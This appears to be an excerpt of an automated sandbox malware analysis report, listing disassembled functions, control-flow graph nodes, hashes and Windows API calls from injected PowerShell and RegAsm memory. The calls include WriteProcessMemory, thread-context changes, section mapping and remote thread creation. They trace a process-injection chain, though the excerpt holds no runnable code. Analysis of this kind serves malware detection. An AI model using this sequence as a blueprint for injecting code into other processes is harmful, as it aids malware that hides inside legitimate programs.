                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 4d3aa8cc181a057a07f6b226da442d9f9e7964650c3097751d4979f7575d45bf
                                                      • Instruction ID: 798c088df425711381faaf5ec7f9c51179fcfb86a5c46f34b48719525a57ffd1
                                                      • Opcode Fuzzy Hash: 4d3aa8cc181a057a07f6b226da442d9f9e7964650c3097751d4979f7575d45bf
                                                      • Instruction Fuzzy Hash: 054188B9D002589FCF00CFA9D984ADEFBF1BB49310F24902AE818B7250D375AA45CF64
                                                      Function 00551774 Relevance: 1.6, APIs: 1, Instructions: 113injectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 394 551774-555fff 396 556016-556076 WriteProcessMemory 394->396 397 556001-556013 394->397 398 55607f-5560bd 396->398 399 556078-55607e 396->399 397->396 399->398
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00556066
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: cb6e362789bbc66077daea1670796f58ce4e5b1c9cb24fffc8db9b4158a7fd4d
                                                      • Instruction ID: 58c2de7746f009fff3819a7227ccbc1bb038203320fd37f4afe7032b764a79ca
                                                      • Opcode Fuzzy Hash: cb6e362789bbc66077daea1670796f58ce4e5b1c9cb24fffc8db9b4158a7fd4d
                                                      • Instruction Fuzzy Hash: 5F4177B5D042589FCF10CFA9D984AEEFBF1BB49310F24902AE818B7350D375AA45CB64
                                                      Function 00555C61 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 418 555c61-555cc4 419 555cc6-555cd8 418->419 420 555cdb-555d22 Wow64SetThreadContext 418->420 419->420 421 555d24-555d2a 420->421 422 555d2b-555d63 420->422 421->422
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00555D12
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: b4c26b3422080f5b1d530d1c9caecc536a1365c9834f588ab74e21e603f6960e
                                                      • Instruction ID: 157de64ced3839f518fa3b74d3382f71ab8fbe71c037fc61cea7486b2e9775f4
                                                      • Opcode Fuzzy Hash: b4c26b3422080f5b1d530d1c9caecc536a1365c9834f588ab74e21e603f6960e
                                                      • Instruction Fuzzy Hash: A231ADB5D012589FCB10CFA9D584ADDFBF1BB49314F24806AE815B7350D3789949CF54
                                                      Function 00551738 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 402 551738-555cc4 404 555cc6-555cd8 402->404 405 555cdb-555d22 Wow64SetThreadContext 402->405 404->405 406 555d24-555d2a 405->406 407 555d2b-555d63 405->407 406->407
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00555D12
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 7d3f3fd25cbeab5b4c4dd2ba8890afcd9d23f02a464bf440770fd2ae5d7fade4
                                                      • Instruction ID: 305e580b76cd797e5f6a054dad13cc3324458184d97a77d4477f51b2203621f6
                                                      • Opcode Fuzzy Hash: 7d3f3fd25cbeab5b4c4dd2ba8890afcd9d23f02a464bf440770fd2ae5d7fade4
                                                      • Instruction Fuzzy Hash: 73319DB5D012589FCB10CF99D594ADEFBF5BB49314F24802AE815B7310D3749A49CF64
                                                      Function 00551780 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 410 551780-555cc4 412 555cc6-555cd8 410->412 413 555cdb-555d22 Wow64SetThreadContext 410->413 412->413 414 555d24-555d2a 413->414 415 555d2b-555d63 413->415 414->415
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00555D12
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: d12f5c96abfaef160b41f55f641394fd9d95cebf83cc168c54020d4efd5e2543
                                                      • Instruction ID: a5ce0e891cbe5f34c863894edf0342eae13cf7f0c435b25c89f06b0ec6e06878
                                                      • Opcode Fuzzy Hash: d12f5c96abfaef160b41f55f641394fd9d95cebf83cc168c54020d4efd5e2543
                                                      • Instruction Fuzzy Hash: 7231ADB5D012589FCB10CF99D584ADDFBF1BB49310F24802AE818B7310D374AA49CF64
                                                      Function 005560D0 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 425 5560d0-55615e ResumeThread 427 556167-556195 425->427 428 556160-556166 425->428 428->427
                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 0055614E
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 000a5f465f4e71d0d4c85aa7d63b709ff99bb873f071232edc548afa4f4726ab
                                                      • Instruction ID: 49dce265956ac09f49d99ada0a6375d973077e5f9cb45ebf80572e5beb208c3c
                                                      • Opcode Fuzzy Hash: 000a5f465f4e71d0d4c85aa7d63b709ff99bb873f071232edc548afa4f4726ab
                                                      • Instruction Fuzzy Hash: F2219BB9D042489FCB10CFA9D584AEEFBF4BB49320F24905AE818B7310D374A945CFA4
                                                      Function 00551798 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 431 551798-55615e ResumeThread 433 556167-556195 431->433 434 556160-556166 431->434 434->433
                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 0055614E
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 53936da8dd8fc45941145d2a719ce161a58b261e2e9680f70c9e10785c814859
                                                      • Instruction ID: a23a298c7733008851ca822e37765e14dc776eeedac88efbd1791d444a355da7
                                                      • Opcode Fuzzy Hash: 53936da8dd8fc45941145d2a719ce161a58b261e2e9680f70c9e10785c814859
                                                      • Instruction Fuzzy Hash: 37218CB8D042589FCB10CFA9D584AEEFBF4BB49310F24946AE818B7310D374A945CFA5
                                                      Function 001ED01D Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363563690.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_1ed000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 335d8be87d1cd0ef9a97ff6ab4498bf81df2babeb1b1c3520a714c5fe43cc4be
                                                      • Instruction ID: 31582164df6d9ea605d2907bdaa490ee8d2c1cfe74c91e014259f7e635cba7df
                                                      • Opcode Fuzzy Hash: 335d8be87d1cd0ef9a97ff6ab4498bf81df2babeb1b1c3520a714c5fe43cc4be
                                                      • Instruction Fuzzy Hash: 5401A271504780AEE7205E2AE984B6BFFD8EF41724F2C841AFC494B286C779D845CAB1
                                                      Function 001ED006 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363563690.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_1ed000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dcda0eb21df8cdb11df20c216574c5e52b47f478f39104e8d697939fb3d10931
                                                      • Instruction ID: 0c02ca2936b494fd26fe6d6042c4eec4db4fe4669697be3e83a4d0f0edb865b3
                                                      • Opcode Fuzzy Hash: dcda0eb21df8cdb11df20c216574c5e52b47f478f39104e8d697939fb3d10931
                                                      • Instruction Fuzzy Hash: 6A012D6140E7C05FD7124B259C94B66BFB4DF43224F1D81DBE8888F1A7C2699848C772

                                                      Non-executed Functions

                                                      Function 008800A0 Relevance: 15.4, Strings: 12, Instructions: 398COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363671503.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_880000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (:}$(:}$(:}$L4p$L4p$L4p$L4p$L4p$L4p$L:}$L:}$L:}
                                                      • API String ID: 0-1774546207
                                                      • Opcode ID: a892f64c9af21c8fd4002f39bdd5b1642e3bcb874ec1723ae0eb4c4e85fe2d4e
                                                      • Instruction ID: 52c61adca39a7d8a1b0b5071d7d027a981296f67a127063b71ff723739b06251
                                                      • Opcode Fuzzy Hash: a892f64c9af21c8fd4002f39bdd5b1642e3bcb874ec1723ae0eb4c4e85fe2d4e
                                                      • Instruction Fuzzy Hash: D2D14335700248EFCB65AF68D814BAE7BA2FFC5310F188466E945DB291CB70DD49CB92
                                                      Function 008813A8 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363671503.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_880000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: h<}$$p$$p$$p
                                                      • API String ID: 0-2836683382
                                                      • Opcode ID: fffeedf73c2cfd99ecd7a8c1b3e7978b9b0d0b465575a65cb88ac66530ff3252
                                                      • Instruction ID: b1c6ec1935d10f42ea5a150ec63cf66330db272461bd55ffe537cc135d11efd7
                                                      • Opcode Fuzzy Hash: fffeedf73c2cfd99ecd7a8c1b3e7978b9b0d0b465575a65cb88ac66530ff3252
                                                      • Instruction Fuzzy Hash: A9511375B043059FCF24AA69884876BBBEAFBC1310F68846AD846DB251DE71DC42C7A1
                                                      Function 008806C1 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363671503.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_880000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'p$4'p$$p$$p
                                                      • API String ID: 0-377911355
                                                      • Opcode ID: 16c433fb7111329ca6c4c7d1881ee2c6c3ad5379ec88f5bee7074d6a76d4486b
                                                      • Instruction ID: 0449303a2b9ca08fd3a32a464c073dc6972cc6c7b2c240b63b1d8fc84512a212
                                                      • Opcode Fuzzy Hash: 16c433fb7111329ca6c4c7d1881ee2c6c3ad5379ec88f5bee7074d6a76d4486b
                                                      • Instruction Fuzzy Hash: 07015E2560D3C14FC76A226818205A9AFB2ABD32507AE41DBD1D1CF297C9558C0AC7A6

                                                      Execution Graph

                                                      Execution Coverage:8.9%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:52.9%
                                                      Total number of Nodes:68
                                                      Total number of Limit Nodes:2
                                                      execution_graph 2000 402d65 2001 402d69 2000->2001 2002 4018a6 8 API calls 2001->2002 2003 402ea5 2001->2003 2002->2003 2008 401706 2009 4016ea 2008->2009 2011 401789 2009->2011 2012 4017b4 2011->2012 2015 40328d 2012->2015 2014 4017e8 2014->2009 2017 40327d 2015->2017 2018 40323d 2015->2018 2016 4032a1 Sleep 2016->2018 2017->2014 2018->2015 2018->2016 2018->2017 2104 4018b1 2105 401903 2104->2105 2107 4018b5 2104->2107 2106 4014bf 7 API calls 2105->2106 2109 40191a 2105->2109 2106->2109 2108 4018ee Sleep 2107->2108 2108->2105 2047 4014d6 2048 4014c4 2047->2048 2049 40156f NtDuplicateObject 2048->2049 2057 40168b 2048->2057 2050 40158c NtCreateSection 2049->2050 2049->2057 2051 4015b2 NtMapViewOfSection 2050->2051 2052 40160c NtCreateSection 2050->2052 2051->2052 2053 4015d5 NtMapViewOfSection 2051->2053 2054 401638 2052->2054 2052->2057 2053->2052 2055 4015f3 2053->2055 2056 401642 NtMapViewOfSection 2054->2056 2054->2057 2055->2052 2056->2057 2058 401669 NtMapViewOfSection 2056->2058 2058->2057 1996 402f5d 1997 4030b4 1996->1997 1998 402f87 1996->1998 1998->1997 1999 403042 RtlCreateUserThread NtTerminateProcess 1998->1999 1999->1997 1970 402dfe 1971 402dee 1970->1971 1973 402ea5 1971->1973 1974 4018a6 1971->1974 1975 4018b7 1974->1975 1976 4018ee Sleep 1975->1976 1977 401903 1976->1977 1979 40191a 1977->1979 1980 4014bf 1977->1980 1979->1973 1981 4014ce 1980->1981 1982 40156f NtDuplicateObject 1981->1982 1988 40168b 1981->1988 1983 40158c NtCreateSection 1982->1983 1982->1988 1984 4015b2 NtMapViewOfSection 1983->1984 1985 40160c NtCreateSection 1983->1985 1984->1985 1986 4015d5 NtMapViewOfSection 1984->1986 1987 401638 1985->1987 1985->1988 1986->1985 1989 4015f3 1986->1989 1987->1988 1990 401642 NtMapViewOfSection 1987->1990 1988->1979 1989->1985 1990->1988 1991 401669 NtMapViewOfSection 1990->1991 1991->1988 2110 4018be 2111 4018b7 2110->2111 2112 4018ee Sleep 2111->2112 2113 401903 2112->2113 2114 4014bf 7 API calls 2113->2114 2115 40191a 2113->2115 2114->2115 2116 4016be 2117 4016d3 2116->2117 2118 401789 Sleep 2117->2118 2118->2117 1992 4030bf 1993 403055 RtlCreateUserThread NtTerminateProcess 1992->1993 1995 4030d1 1992->1995 1994 4030b4 1993->1994 1995->1995

                                                      Executed Functions

                                                      Function 004014D6 Relevance: 10.8, APIs: 7, Instructions: 253nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 4014d6-4014d7 1 4014c4-4014c8 0->1 2 4014d8-401519 call 401164 0->2 1->2 13 40151b 2->13 14 40151e-401523 2->14 13->14 16 401529-40153a 14->16 17 40184d-401855 14->17 21 401540-401569 16->21 22 40184b 16->22 17->14 20 40185a-401883 17->20 30 401874-40187f 20->30 31 401886-4018a3 call 401164 20->31 21->22 29 40156f-401586 NtDuplicateObject 21->29 22->20 29->22 32 40158c-4015b0 NtCreateSection 29->32 30->31 34 4015b2-4015d3 NtMapViewOfSection 32->34 35 40160c-401632 NtCreateSection 32->35 34->35 37 4015d5-4015f1 NtMapViewOfSection 34->37 35->22 38 401638-40163c 35->38 37->35 41 4015f3-401609 37->41 38->22 42 401642-401663 NtMapViewOfSection 38->42 41->35 42->22 44 401669-401685 NtMapViewOfSection 42->44 44->22 46 40168b call 401690 44->46
                                                      APIs
                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: Section$CreateDuplicateObjectView
                                                      • String ID:
                                                      • API String ID: 1652636561-0
                                                      • Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                      • Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
                                                      • Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                      • Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64
                                                      Function 004014BF Relevance: 10.7, APIs: 7, Instructions: 204nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 48 4014bf-4014c8 49 4014d8 48->49 50 4014ce-401519 call 401164 48->50 49->50 60 40151b 50->60 61 40151e-401523 50->61 60->61 63 401529-40153a 61->63 64 40184d-401855 61->64 68 401540-401569 63->68 69 40184b 63->69 64->61 67 40185a-401883 64->67 77 401874-40187f 67->77 78 401886-4018a3 call 401164 67->78 68->69 76 40156f-401586 NtDuplicateObject 68->76 69->67 76->69 79 40158c-4015b0 NtCreateSection 76->79 77->78 81 4015b2-4015d3 NtMapViewOfSection 79->81 82 40160c-401632 NtCreateSection 79->82 81->82 84 4015d5-4015f1 NtMapViewOfSection 81->84 82->69 85 401638-40163c 82->85 84->82 88 4015f3-401609 84->88 85->69 89 401642-401663 NtMapViewOfSection 85->89 88->82 89->69 91 401669-401685 NtMapViewOfSection 89->91 91->69 93 40168b call 401690 91->93
                                                      APIs
                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: Section$View$Create$DuplicateObject
                                                      • String ID:
                                                      • API String ID: 1546783058-0
                                                      • Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                      • Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
                                                      • Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                      • Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65
                                                      Function 004014E8 Relevance: 10.7, APIs: 7, Instructions: 168nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 95 4014e8 96 4014e0-4014e5 95->96 97 4014ec-401519 call 401164 95->97 96->97 103 40151b 97->103 104 40151e-401523 97->104 103->104 106 401529-40153a 104->106 107 40184d-401855 104->107 111 401540-401569 106->111 112 40184b 106->112 107->104 110 40185a-401883 107->110 120 401874-40187f 110->120 121 401886-4018a3 call 401164 110->121 111->112 119 40156f-401586 NtDuplicateObject 111->119 112->110 119->112 122 40158c-4015b0 NtCreateSection 119->122 120->121 124 4015b2-4015d3 NtMapViewOfSection 122->124 125 40160c-401632 NtCreateSection 122->125 124->125 127 4015d5-4015f1 NtMapViewOfSection 124->127 125->112 128 401638-40163c 125->128 127->125 131 4015f3-401609 127->131 128->112 132 401642-401663 NtMapViewOfSection 128->132 131->125 132->112 134 401669-401685 NtMapViewOfSection 132->134 134->112 136 40168b call 401690 134->136
                                                      APIs
                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: Section$View$Create$DuplicateObject
                                                      • String ID:
                                                      • API String ID: 1546783058-0
                                                      • Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                      • Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
                                                      • Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                      • Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24
                                                      Function 004014EB Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 138 4014eb-401519 call 401164 143 40151b 138->143 144 40151e-401523 138->144 143->144 146 401529-40153a 144->146 147 40184d-401855 144->147 151 401540-401569 146->151 152 40184b 146->152 147->144 150 40185a-401883 147->150 160 401874-40187f 150->160 161 401886-4018a3 call 401164 150->161 151->152 159 40156f-401586 NtDuplicateObject 151->159 152->150 159->152 162 40158c-4015b0 NtCreateSection 159->162 160->161 164 4015b2-4015d3 NtMapViewOfSection 162->164 165 40160c-401632 NtCreateSection 162->165 164->165 167 4015d5-4015f1 NtMapViewOfSection 164->167 165->152 168 401638-40163c 165->168 167->165 171 4015f3-401609 167->171 168->152 172 401642-401663 NtMapViewOfSection 168->172 171->165 172->152 174 401669-401685 NtMapViewOfSection 172->174 174->152 176 40168b call 401690 174->176
                                                      APIs
                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: Section$View$Create$DuplicateObject
                                                      • String ID:
                                                      • API String ID: 1546783058-0
                                                      • Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                      • Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
                                                      • Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                      • Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64
                                                      Function 00402F5D Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 178 402f5d-402f81 179 4030b4-4030b9 178->179 180 402f87-402f9f 178->180 180->179 181 402fa5-402fb6 180->181 182 402fb8-402fc1 181->182 183 402fc6-402fd4 182->183 183->183 184 402fd6-402fdd 183->184 185 402fff-403006 184->185 186 402fdf-402ffe 184->186 187 403028-40302b 185->187 188 403008-403027 185->188 186->185 189 403034 187->189 190 40302d-403030 187->190 188->187 189->182 192 403036-40303b 189->192 190->189 191 403032 190->191 191->192 192->179 193 40303d-403040 192->193 193->179 194 403042-4030b1 RtlCreateUserThread NtTerminateProcess 193->194 194->179
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: CreateProcessTerminateThreadUser
                                                      • String ID:
                                                      • API String ID: 1921587553-0
                                                      • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                      • Instruction ID: 028c31f760cafe6bdfeacd3711728474bc178c938afdf01909161d150e4b5d3c
                                                      • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                      • Instruction Fuzzy Hash: 84416831228D094FD768EF5CA845762B7D5F798351F6643AAE809D3389EA34DC1183C6
                                                      Function 004030BF Relevance: 3.1, APIs: 2, Instructions: 82nativethreadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 195 4030bf-4030cf 196 4030d1-403109 195->196 197 403055-4030b1 RtlCreateUserThread NtTerminateProcess 195->197 201 403113-403118 196->201 202 40310b 196->202 198 4030b4-4030b9 197->198 203 40311a 201->203 204 40311f-403141 call 4011db 201->204 202->201 205 40310d-403110 202->205 203->204 206 40311c 203->206 211 403145 204->211 205->201 206->204 211->211
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: CreateProcessTerminateThreadUser
                                                      • String ID:
                                                      • API String ID: 1921587553-0
                                                      • Opcode ID: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                      • Instruction ID: 715d93b18a869b872d6bab68aa9d9aa25fe40f65b3c459de5f1da0bbea4f6161
                                                      • Opcode Fuzzy Hash: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                      • Instruction Fuzzy Hash: 222105309087448FE3549F7C98423A6BFE0EB4A311F6805AFD596DA2D2D33E5A46C787
